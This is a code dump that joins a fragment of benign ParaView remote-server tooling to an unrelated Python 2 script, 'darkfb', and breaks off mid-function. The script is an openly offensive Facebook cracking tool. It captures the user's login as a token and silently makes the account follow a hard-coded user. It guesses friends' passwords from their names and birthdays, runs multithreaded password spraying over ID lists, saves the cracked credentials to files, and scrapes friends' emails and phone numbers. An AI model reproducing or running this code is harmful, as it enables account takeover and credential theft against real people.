# print 'Starting test ssh'
status = Value('i', 1)
process_id = mp.Process(target=test_ssh, args=(status,), kwargs=kwargs)
process_id.start()
process_id.join()
if status.value == 0:
return False
return True
def test_remote_tunnel(**kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
try:
env.use_ssh_config = True
execute(run_uname, True, hosts=[_remote_host])
except:
return False
return True
def get_remote_port(**kwargs):
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
paraview_remote_port = analysis.data.paraview_remote_port
if 'paraview_remote_port' in kwargs:
paraview_remote_port = kwargs['paraview_remote_port']
else:
# Attempt to find an unused remote port
print 'Attempting to find unused port in range 12000 to 13000'
for p in range(12000, 13000):
tp = Value('i', p)
process_id = mp.Process(target=test_remote_port,
args=(port_test, tp,
paraview_port, _remote_host))
process_id.start()
process_id.join()
# print tp.value
if tp.value != 0:
break
print 'Selected Port: ' + str(p)
analysis.data.paraview_remote_port = p
def test_remote_port(port_test, port, paraview_port, remote_host):
try:
env.use_ssh_config = True
execute(port_test, port.value, paraview_port, hosts=[remote_host])
return True
except:
port.value = 0
return False
def pvserver_start(remote_host, remote_dir, paraview_cmd):
if paraview_cmd is not None:
env.use_ssh_config = True
execute(pvserver, remote_dir, paraview_cmd, hosts=[remote_host])
def pvserver_connect(**kwargs):
"""
Be careful when adding to this function fabric execute calls do not play
well with multiprocessing. Do not mix direct fabric execute call and
mp based fabric execute calls
"""
#global remote_data, data_dir, data_host, remote_server_auto
#global paraview_cmd, process_id, paraview_port, paraview_remote_port
#global process_id
_paraview_cmd = analysis.data.paraview_cmd
if 'paraview_cmd' in kwargs:
_paraview_cmd = kwargs['paraview_cmd']
if '-sp' in _paraview_cmd or '--client-host' in _paraview_cmd:
print('pvserver_process: Please only provide pvserver'
'executable path and name without arguments')
print 'e.g. mpiexec -n 1 /path_to_pvserver/bin/pvserver'
return False
# Add Check for passwordless ssh
print 'Testing passwordless ssh access'
if not test_ssh_mp(**kwargs):
print 'ERROR: Passwordless ssh access to data host failed'
return False
print '-> Passed'
# Add check for paraview version
# Find free remote port
get_remote_port(**kwargs)
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
if not use_multiprocess:
pvserver_process(**kwargs)
else:
print 'Starting pvserver connect'
process_id = mp.Process(target=pvserver_process, kwargs=kwargs)
process_id.start()
# process_id.join()
# time.sleep(6)
ReverseConnect(paraview_port)
return True
def pvcluster_process(**kwargs):
pvserver_process(**kwargs)
def pvserver_process(**kwargs):
#global remote_data, data_dir, data_host, remote_server_auto
#global paraview_cmd, paraview_home, paraview_port, paraview_remote_port
print 'Starting pvserver process'
_remote_dir = analysis.data.data_dir
if 'data_dir' in kwargs:
_remote_dir = kwargs['data_dir']
_paraview_cmd = analysis.data.paraview_cmd
if 'paraview_cmd' in kwargs:
_paraview_cmd = kwargs['paraview_cmd']
_paraview_home = analysis.data.paraview_home
if 'paraview_home' in kwargs:
_paraview_home = kwargs['paraview_home']
paraview_port = analysis.data.paraview_port
if 'paraview_port' in kwargs:
paraview_port = kwargs['paraview_port']
"""
_job_ntasks = 1
if 'job_ntasks' in kwargs:
_job_ntasks = kwargs['job_ntasks']
"""
_remote_host = analysis.data.data_host
if 'data_host' in kwargs:
_remote_host = kwargs['data_host']
# This global variable may have already been set so check
paraview_remote_port = analysis.data.paraview_remote_port
if 'paraview_remote_port' in kwargs:
paraview_remote_port = kwargs['paraview_remote_port']
else:
# Attempt to find an unused remote port
print 'Attempting to find unused port in range 12000 to 13000'
for p in range(12000, 13000):
try:
env.use_ssh_config = True
execute(port_test, p, paraview_port, hosts=[_remote_host])
break
except:
pass
print 'Selected Port: ' + str(p)
analysis.data.paraview_remote_port = p
if 'job_queue' in kwargs:
# Submit job
remote_hostname = _remote_host[_remote_host.find('@') + 1:]
if 'vizstack' in kwargs:
paraview_args = ('/opt/vizstack/bin/viz-paraview -r ' +
str(kwargs['job_ntasks']) + ' -c ' +
remote_hostname + ' -p ' +
str(paraview_remote_port))
else:
paraview_args = (' -rc --client-host=' + remote_hostname +
' -sp=' + str(paraview_remote_port))
print paraview_args
job_dict = {
'job_queue': kwargs['job_queue'],
'job_ntasks': kwargs['job_ntasks'],
'job_ntaskpernode': kwargs['job_ntaskpernode'],
'job_project': kwargs['job_project'],
}
if _paraview_home is not None:
env.use_ssh_config = True
execute(pvcluster, _remote_dir, _paraview_home, paraview_args,
analysis.data.paraview_port, analysis.data.paraview_remote_port,
job_dict, hosts=[_remote_host])
else:
# Run Paraview
if '-sp' in _paraview_cmd or '--client-host' in _paraview_cmd:
print ('pvserver_process: Please only provide pvserver'
'executable path and name without arguments')
print 'e.g. mpiexec -n 1 /path_to_pvserver/bin/pvserver'
return False
if 'vizstack' in kwargs:
_paraview_cmd = (_paraview_cmd + ' -c localhost ' + ' -p ' +
str(analysis.data.paraview_remote_port))
else:
_paraview_cmd = (_paraview_cmd +
' -rc --client-host=localhost -sp=' +
str(analysis.data.paraview_remote_port))
if _paraview_cmd is not None:
env.use_ssh_config = True
execute(pvserver, _remote_dir, _paraview_cmd, analysis.data.paraview_port,
analysis.data.paraview_remote_port, hosts=[_remote_host])
def pvserver_disconnect():
Disconnect()
if process_id:
process_id.terminate()
|
darkfb_wrd_234.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Surya Febri Alwari \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/zeargames/Darkfb-Zeargames\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m: \x1b[1;92\x1b[92mTutotial_Sulit\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n[*] Login Using Operamini To Not Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://bit.ly/2XGQVlv')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '1'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '234'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('allahuakbar')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
